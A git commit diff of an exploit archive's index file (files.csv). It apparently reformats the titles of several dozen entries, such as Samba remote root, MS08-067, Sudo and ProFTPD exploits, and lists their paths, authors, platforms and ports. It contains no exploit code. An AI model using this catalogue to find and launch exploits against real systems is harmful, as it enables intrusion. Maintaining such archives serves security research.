Updated 07_15_2014
parent
5eff4e51ec
commit
9b54da834d
18 changed files with 1034 additions and 639 deletions
62
files.csv
|
@ -5,10 +5,10 @@ id,file,description,date,author,platform,type,port
|
|||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname Buffer Overflow Exploit",2003-04-01,Andi,solaris,local,0
|
||||
5,platforms/windows/remote/5.c,"MS Windows RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
6,platforms/php/webapps/6.php,"WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit",2006-05-25,rgod,php,webapps,0
|
||||
7,platforms/linux/remote/7.pl,"Samba 2.2.x Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139
|
||||
7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139
|
||||
8,platforms/linux/remote/8.c,"SETI@home Clients Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0
|
||||
9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0
|
||||
10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit - sambal.c",2003-04-10,eSDee,linux,remote,139
|
||||
10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
|
||||
11,platforms/linux/dos/11.c,"Apache <= 2.0.44 Linux Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0
|
||||
13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0
|
||||
|
@ -1258,7 +1258,7 @@ id,file,description,date,author,platform,type,port
|
|||
1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0
|
||||
1516,platforms/php/webapps/1516.php,"ilchClan <= 1.05g (tid) Remote SQL Injection Exploit",2006-02-20,x128,php,webapps,0
|
||||
1517,platforms/php/webapps/1517.c,"PunBB <= 2.0.10 (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,webapps,0
|
||||
1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit",2006-02-20,"Marco Ivaldi",linux,local,0
|
||||
1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 - User-Defined Function Local Privilege Escalation Exploit",2006-02-20,"Marco Ivaldi",linux,local,0
|
||||
1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser (Safe File) Remote Code Execution Exploit",2006-02-22,"H D Moore",osx,remote,0
|
||||
1520,platforms/windows/remote/1520.pl,"MS Windows Media Player Plugin Overflow Exploit (MS06-006)(3)",2006-02-22,"Matthew Murphy",windows,remote,0
|
||||
1521,platforms/php/webapps/1521.php,"Noahs Classifieds <= 1.3 (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0
|
||||
|
@ -1501,7 +1501,7 @@ id,file,description,date,author,platform,type,port
|
|||
1788,platforms/windows/remote/1788.pm,"PuTTy.exe <= 0.53 - (validation) Remote Buffer Overflow Exploit (meta)",2006-05-15,y0,windows,remote,0
|
||||
1789,platforms/php/webapps/1789.txt,"TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion Vulnerability",2006-05-15,Kacper,php,webapps,0
|
||||
1790,platforms/php/webapps/1790.txt,"Squirrelcart <= 2.2.0 (cart_content.php) Remote Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0
|
||||
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication - Auth Bypass Patch (EXE)",2006-05-16,redsand,multiple,remote,5900
|
||||
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication - Auth Bypass (Patch EXE)",2006-05-16,redsand,multiple,remote,5900
|
||||
1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0
|
||||
1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0
|
||||
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900
|
||||
|
@ -1613,7 +1613,7 @@ id,file,description,date,author,platform,type,port
|
|||
1903,platforms/php/webapps/1903.txt,"Content-Builder (CMS) 0.7.5 - Multiple Include Vulnerabilities",2006-06-11,"Federico Fazzi",php,webapps,0
|
||||
1904,platforms/php/webapps/1904.php,"blur6ex <= 0.3.462 (ID) Admin Disclosure / Blind SQL Injection Exploit",2006-06-12,rgod,php,webapps,0
|
||||
1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x (root) Remote File Include Vulnerability",2006-06-12,"Federico Fazzi",php,webapps,0
|
||||
1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g (MKD) Remote Buffer Overflow Exploit",2006-06-12,h07,windows,remote,0
|
||||
1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow Exploit",2006-06-12,h07,windows,remote,0
|
||||
1907,platforms/php/webapps/1907.txt,"aWebNews <= 1.5 (visview.php) Remote File Include Vulnerability",2006-06-13,SpC-x,php,webapps,0
|
||||
1908,platforms/php/webapps/1908.txt,"Minerva <= 2.0.8a Build 237 (phpbb_root_path) File Include Vulnerability",2006-06-13,Kacper,php,webapps,0
|
||||
1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution Exploit",2006-06-13,"Javier Olascoaga",php,webapps,0
|
||||
|
@ -1622,7 +1622,7 @@ id,file,description,date,author,platform,type,port
|
|||
1912,platforms/php/webapps/1912.txt,"The Bible Portal Project <= 2.12 (destination) File Include Vulnerability",2006-06-14,Kacper,php,webapps,0
|
||||
1913,platforms/php/webapps/1913.txt,"Php Blue Dragon CMS <= 2.9.1 (template.php) File Include Vulnerability",2006-06-14,"Federico Fazzi",php,webapps,0
|
||||
1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) <= 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0
|
||||
1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g (MKD) Remote Buffer Overflow Exploit (meta)",2006-06-15,c0rrupt,windows,remote,0
|
||||
1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow Exploit (meta)",2006-06-15,c0rrupt,windows,remote,0
|
||||
1916,platforms/php/webapps/1916.txt,"DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities",2006-06-15,"Andreas Sandblad",php,webapps,0
|
||||
1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 (Long Filename) Buffer Overflow Exploit",2006-06-15,c0rrupt,windows,local,0
|
||||
1918,platforms/php/webapps/1918.php,"bitweaver <= 1.3 (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0
|
||||
|
@ -1722,7 +1722,7 @@ id,file,description,date,author,platform,type,port
|
|||
2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
|
||||
2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)",2006-07-15,UmZ,multiple,remote,10000
|
||||
2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (perl)",2006-07-15,UmZ,multiple,remote,10000
|
||||
2018,platforms/php/webapps/2018.txt,"FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability",2006-07-16,igi,php,webapps,0
|
||||
2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod <= 1.2 (m2f_root_path) Remote Include Vulns",2006-07-17,OLiBekaS,php,webapps,0
|
||||
2020,platforms/php/webapps/2020.txt,"com_videodb Mambo Component <= 0.3en Remote Include Vulnerability",2006-07-17,h4ntu,php,webapps,0
|
||||
|
@ -2159,7 +2159,7 @@ id,file,description,date,author,platform,type,port
|
|||
2464,platforms/osx/local/2464.pl,"Mac OS X <= 10.4.7 - Mach Exception Handling Local Exploit (10.3.x 0day)",2006-09-30,"Kevin Finisterre",osx,local,0
|
||||
2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 (BSX_LIBDIR) Remote File Include Exploit",2006-10-01,Kacper,php,webapps,0
|
||||
2466,platforms/linux/local/2466.pl,"cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit",2006-10-01,"Clint Torrez",linux,local,0
|
||||
2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 (Source) Remote Exploit",2006-10-01,muts,windows,remote,81
|
||||
2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit",2006-10-01,muts,windows,remote,81
|
||||
2468,platforms/php/webapps/2468.txt,"BBaCE <= 3.5 (includes/functions.php) Remote File Include Vulnerability",2006-10-02,SpiderZ,php,webapps,0
|
||||
2469,platforms/php/webapps/2469.pl,"JAF CMS <= 4.0 RC1 (forum.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0
|
||||
2470,platforms/php/webapps/2470.txt,"phpMyProfiler <= 0.9.6 - Remote File Include Vulnerability",2006-10-03,mozi,php,webapps,0
|
||||
|
@ -2701,7 +2701,7 @@ id,file,description,date,author,platform,type,port
|
|||
3026,platforms/php/webapps/3026.txt,"Bubla <= 1.0.0rc2 (bu/process.php) Remote File Include Vulnerability",2006-12-27,DeltahackingTEAM,php,webapps,0
|
||||
3027,platforms/php/webapps/3027.txt,"Fantastic News <= 2.1.4 - Multiple Remote File Include Vulnerabilities",2006-12-27,Mr-m07,php,webapps,0
|
||||
3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Include Vulnerability",2006-12-27,"Mehmet Ince",php,webapps,0
|
||||
3029,platforms/php/webapps/3029.php,"Cacti <= 0.8.6i cmd.php popen() Remote Injection Exploit",2006-12-27,rgod,php,webapps,0
|
||||
3029,platforms/php/webapps/3029.php,"Cacti <= 0.8.6i - cmd.php popen() Remote Injection Exploit",2006-12-27,rgod,php,webapps,0
|
||||
3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 ierpplug.dll Internet Explorer Denial of Service Exploit",2006-12-28,shinnai,windows,dos,0
|
||||
3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 (faqDsp.asp catcode) Remote SQL Injection Vulnerability",2006-12-28,ajann,asp,webapps,0
|
||||
3032,platforms/asp/webapps/3032.txt,"wywo - inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0
|
||||
|
@ -2941,7 +2941,7 @@ id,file,description,date,author,platform,type,port
|
|||
3271,platforms/php/webapps/3271.php,"GGCMS <= 1.1.0 RC1 Remote Code Execution Exploit",2007-02-05,Kacper,php,webapps,0
|
||||
3272,platforms/windows/dos/3272.html,"MS Internet Explorer 6 (mshtml.dll) Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0
|
||||
3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0
|
||||
3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 User-Defined Function Command Execution Exploit (win)",2007-02-06,"Marco Ivaldi",windows,remote,3306
|
||||
3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 - User-Defined Function Command Execution Exploit (win)",2007-02-06,"Marco Ivaldi",windows,remote,3306
|
||||
3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 (inhalt.php) Remote File Include Vulnerability",2007-02-06,ajann,php,webapps,0
|
||||
3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 Remote Buffer Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0
|
||||
3277,platforms/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 Remote Heap Overflow DoS Exploit",2007-02-06,Marsu,windows,dos,0
|
||||
|
@ -5342,7 +5342,7 @@ id,file,description,date,author,platform,type,port
|
|||
5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability",2008-06-01,KnocKout,asp,webapps,0
|
||||
5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC",2008-06-01,securfrog,windows,dos,0
|
||||
5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 - Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0
|
||||
5720,platforms/linux/remote/5720.py,"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
|
||||
5720,platforms/linux/remote/5720.py,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
|
||||
5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp <= 0.12.x Blind SQL Injection Exploit",2008-06-02,His0k4,php,webapps,0
|
||||
5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-06-02,HaiHui,php,webapps,0
|
||||
5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 - Remote SQL injection Vulnerability",2008-06-02,His0k4,php,webapps,0
|
||||
|
@ -6686,7 +6686,7 @@ id,file,description,date,author,platform,type,port
|
|||
7129,platforms/multiple/local/7129.sh,"Sudo <= 1.6.9p18 - (Defaults setenv) Local Privilege Escalation Exploit",2008-11-15,kingcope,multiple,local,0
|
||||
7130,platforms/php/webapps/7130.php,"Minigal b13 (index.php list) Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0
|
||||
7131,platforms/php/webapps/7131.txt,"yahoo answers (id) Remote SQL Injection Vulnerability",2008-11-16,snakespc,php,webapps,0
|
||||
7132,platforms/windows/remote/7132.py,"MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)",2008-11-16,"Debasis Mohanty",windows,remote,445
|
||||
7132,platforms/windows/remote/7132.py,"MS Windows Server Service - Code Execution Exploit (MS08-067) (2k/2k3)",2008-11-16,"Debasis Mohanty",windows,remote,445
|
||||
7133,platforms/php/webapps/7133.txt,"FloSites Blog Multiple Remote SQL Injection Vulnerabilities",2008-11-16,Vrs-hCk,php,webapps,0
|
||||
7134,platforms/php/webapps/7134.txt,"phpstore Wholesale (track.php?id) SQL Injection Vulnerability",2008-11-16,"Hussin X",php,webapps,0
|
||||
7135,platforms/windows/local/7135.htm,"Opera 9.62 file:// Local Heap Overflow Exploit",2008-11-17,"Guido Landi",windows,local,0
|
||||
|
@ -8098,7 +8098,7 @@ id,file,description,date,author,platform,type,port
|
|||
8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 - (.M3U File) Local Stack Overflow Exploit (3)",2009-05-01,Stack,windows,local,0
|
||||
8593,platforms/php/webapps/8593.txt,"pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability",2009-05-01,SirGod,php,webapps,0
|
||||
8594,platforms/windows/local/8594.pl,"RM Downloader (.smi File) Universal Local Buffer Overflow Exploit",2009-05-01,Stack,windows,local,0
|
||||
8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0
|
||||
8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 – 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0
|
||||
8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0
|
||||
8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris (dtrace) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0
|
||||
8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris (fasttrap) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0
|
||||
|
@ -8684,7 +8684,7 @@ id,file,description,date,author,platform,type,port
|
|||
9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 (LANG) Remote File Inclusion Vulnerabilities",2009-07-20,NoGe,php,webapps,0
|
||||
9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 (sql/xss/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0
|
||||
9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0
|
||||
9207,platforms/windows/local/9207.sh,"PulseAudio setuid Local Privilege Escalation Exploit",2009-07-20,N/A,windows,local,0
|
||||
9207,platforms/windows/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,N/A,windows,local,0
|
||||
9208,platforms/linux/local/9208.txt,"PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)",2009-07-20,N/A,linux,local,0
|
||||
9209,platforms/hardware/remote/9209.txt,"DD-WRT (httpd service) Remote Command Execution Vulnerability",2009-07-20,gat3way,hardware,remote,0
|
||||
9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0
|
||||
|
@ -9343,7 +9343,7 @@ id,file,description,date,author,platform,type,port
|
|||
9966,platforms/windows/remote/9966.txt,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-02,"Nikolas Rangos",windows,remote,80
|
||||
9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 Team Services source code disclosure",2009-10-26,"Daniel Martin",asp,webapps,0
|
||||
9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0
|
||||
9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive Service privilege escalation",2009-10-20,"bellick ",windows,local,0
|
||||
9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0
|
||||
9971,platforms/windows/local/9971.php,"Spider Solitaire PoC",2009-10-15,SirGod,windows,local,0
|
||||
9973,platforms/multiple/local/9973.sh,"Sun VirtualBox <= 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0
|
||||
9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0
|
||||
|
@ -10642,7 +10642,7 @@ id,file,description,date,author,platform,type,port
|
|||
11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0
|
||||
11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php - (id) SQL Injection Vulnerability",2010-03-07,"Easy Laster",php,webapps,0
|
||||
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
|
||||
11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4",2010-03-07,kingcope,multiple,local,0
|
||||
11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x < 1.6.9p21 & 1.7.x < 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
|
||||
11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0
|
||||
11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus ""V4.rgo"" (id) news.php - SQL Injection Vulnerability",2010-03-08,"Easy Laster",php,webapps,0
|
||||
11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0
|
||||
|
@ -10650,7 +10650,7 @@ id,file,description,date,author,platform,type,port
|
|||
11657,platforms/php/webapps/11657.txt,"Chaton <= 1.5.2 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0
|
||||
11660,platforms/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,blake,php,webapps,0
|
||||
11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
|
||||
11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
|
||||
11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
|
||||
11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver <= 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0
|
||||
11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0
|
||||
11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent 1.0 - SQL injection Vulnerability (id)",2010-03-09,kaMtiEz,php,webapps,0
|
||||
|
@ -13262,7 +13262,7 @@ id,file,description,date,author,platform,type,port
|
|||
15300,platforms/php/webapps/15300.txt,"Squirrelcart PRO 3.0.0 - Blind SQL Injection Vulnerability",2010-10-21,"Salvatore Fresta",php,webapps,0
|
||||
15301,platforms/windows/dos/15301.pl,"Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability",2010-10-21,LiquidWorm,windows,dos,0
|
||||
15302,platforms/windows/dos/15302.py,"Spider Player 2.4.5 - Denial of Service Vulnerability",2010-10-22,"MOHAMED ABDI",windows,dos,0
|
||||
15304,platforms/linux/local/15304.txt,"GNU C library dynamic linker LD_AUDIT arbitrary DSO load Vulnerability",2010-10-22,"Tavis Ormandy",linux,local,0
|
||||
15304,platforms/linux/local/15304.txt,"GNU C library dynamic linker LD_AUDIT - Arbitrary DSO Load Vulnerability (Local Root)",2010-10-22,"Tavis Ormandy",linux,local,0
|
||||
15305,platforms/windows/dos/15305.pl,"RarmaRadio <= 2.53.1 (.m3u) Denial of Service vulnerability",2010-10-23,anT!-Tr0J4n,windows,dos,0
|
||||
15306,platforms/win32/dos/15306.pl,"AnyDVD <= 6.7.1.0 - Denial of Service",2010-10-23,Havok,win32,dos,0
|
||||
15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS",2010-10-23,d0lc3,windows,dos,0
|
||||
|
@ -13386,7 +13386,7 @@ id,file,description,date,author,platform,type,port
|
|||
15445,platforms/windows/remote/15445.txt,"femitter ftp server 1.04 - Directory Traversal vulnerability",2010-11-06,chr1x,windows,remote,0
|
||||
15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0
|
||||
15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
|
||||
15449,platforms/linux/remote/15449.pl,"ProFTPD IAC Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
|
||||
15449,platforms/linux/remote/15449.pl,"ProFTPD IAC - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
|
||||
15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
|
||||
15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
|
||||
15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
|
||||
|
@ -13493,7 +13493,7 @@ id,file,description,date,author,platform,type,port
|
|||
15584,platforms/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 - Local Privilege Escalation Vulnerability",2010-11-20,LiquidWorm,windows,local,0
|
||||
15585,platforms/php/webapps/15585.txt,"Joomla Component (com_jimtawl) Local File Inclusion Vulnerability",2010-11-20,Mask_magicianz,php,webapps,0
|
||||
15588,platforms/php/webapps/15588.txt,"s-cms 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0
|
||||
15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler Privilege Escalation 0day",2010-11-20,webDEViL,windows,local,0
|
||||
15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler - Privilege Escalation (0day)",2010-11-20,webDEViL,windows,local,0
|
||||
15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 XSS Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0
|
||||
15592,platforms/php/webapps/15592.txt,"sahitya graphics cms Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Edit E-mail Cross Site Request Forgery exploit",2010-11-21,"Mon7rF .",php,webapps,0
|
||||
|
@ -15668,7 +15668,7 @@ id,file,description,date,author,platform,type,port
|
|||
18080,platforms/linux/local/18080.c,"Linux <= 2.6.37-rc1 serial_multiport_struct Local Info Leak Exploit",2011-11-04,"Todor Donev",linux,local,0
|
||||
18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0
|
||||
18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit",2011-11-04,metasploit,windows,local,0
|
||||
18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
|
||||
18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
|
||||
18084,platforms/php/webapps/18084.php,"phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
|
||||
18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
|
||||
18086,platforms/linux/local/18086.c,"Calibre E-Book Reader Local Root",2011-11-05,zx2c4,linux,local,0
|
||||
|
@ -16205,7 +16205,7 @@ id,file,description,date,author,platform,type,port
|
|||
18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0
|
||||
18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Y?lmaz",php,webapps,0
|
||||
18774,platforms/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 Buffer Overflow",2012-04-23,shinnai,windows,dos,0
|
||||
18775,platforms/php/webapps/18775.php,"WebCalendar <= 1.2.4 (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0
|
||||
18775,platforms/php/webapps/18775.php,"WebCalendar <= 1.2.4 - (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0
|
||||
18776,platforms/windows/dos/18776.txt,"BeyondCHM 1.1 - Buffer Overflow",2012-04-24,shinnai,windows,dos,0
|
||||
18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter Integer Overflow Vulnerability",2012-04-24,"Akita Software Security",windows,dos,0
|
||||
18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 (index.php p parameter) SQL Injection",2012-04-24,G13,php,webapps,0
|
||||
|
@ -18971,7 +18971,7 @@ id,file,description,date,author,platform,type,port
|
|||
21729,platforms/cgi/webapps/21729.txt,"Mozilla Bonsai Multiple Cross Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",cgi,webapps,0
|
||||
21730,platforms/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 Path Disclosure Vulnerability",2002-08-20,"Stan Bubrouski",cgi,webapps,0
|
||||
21731,platforms/novell/remote/21731.pl,"Novell NetWare 5.1/6.0 HTTP Post Arbitrary Perl Code Execution Vulnerability",2002-08-20,"Dan Elder",novell,remote,0
|
||||
21732,platforms/linux/local/21732.txt,"SCPOnly 2.3/2.4 SSH Environment Shell Escaping Vulnerability",2002-08-20,"Derek D. Martin",linux,local,0
|
||||
21732,platforms/linux/local/21732.txt,"SCPOnly 2.3/2.4 - SSH Environment Shell Escaping Vulnerability",2002-08-20,"Derek D. Martin",linux,local,0
|
||||
